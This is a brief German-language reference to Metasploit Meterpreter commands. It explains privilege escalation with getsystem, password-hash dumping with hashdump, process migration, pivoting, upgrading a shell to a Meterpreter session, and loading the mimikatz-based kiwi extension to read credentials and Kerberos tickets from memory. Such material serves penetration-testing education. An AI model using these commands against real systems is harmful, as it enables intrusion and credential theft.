Wichtige Meterpreter-Befehle
background/bg– die Sitzung in den Hintergrund legen.getuid– zeigt den Benutzer, unter dem der Meterpreter-Server aktuell laeuft.getsystem– versucht mehrere Techniken, um auf einem Windows-Ziel die hoechsten Rechte (NT AUTHORITYSYSTEM) zu erlangen.hashdump– liest die lokalen Passwort-Hashes (SAM) des Ziels aus; erhoehte Rechte sind dafuer in der Regel noetig.migrate– verschiebt den Meterpreter-Server in einen anderen, stabileren Prozess, sodass die Sitzung erhalten bleibt, wenn der Ausgangsprozess endet.load– eine oder mehrere Meterpreter-Erweiterungen laden.pivot– Pivot-Listener verwalten.irb– eine interaktive Ruby-Shell in der Sitzung oeffnen.exit/quit– die Meterpreter-Sitzung beenden.
Eine Shell zu Meterpreter aufwerten
Hat man nur eine einfache Shell, laesst sie sich mit dem Post-Modul post/multi/manage/shell_to_meterpreter aufwerten:
msf > use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
Kurzform ist sessions -u <id>. Diese Kurzform nutzt jedoch nur den Standard-Reverse-Meterpreter und funktioniert daher nicht zuverlaessig ueber ein Pivot.
Ueber ein Pivot muss man
LHOSTundLPORTvon Hand setzen, weil das Sitzungsobjekt diese Angaben nicht zwingend kennt. Fuer feine Kontrolle dienen die OptionenPAYLOAD_OVERRIDE,PLATFORM_OVERRIDEund unter WindowsPSH_ARCH_OVERRIDE.
Erweiterungen laden
Ueber load holt man Zusatzfunktionen in die Sitzung. So laedt z. B. load kiwi die mimikatz-basierte kiwi-Erweiterung, mit der sich unter anderem Anmeldedaten und Kerberos-Tickets aus dem Speicher lesen lassen.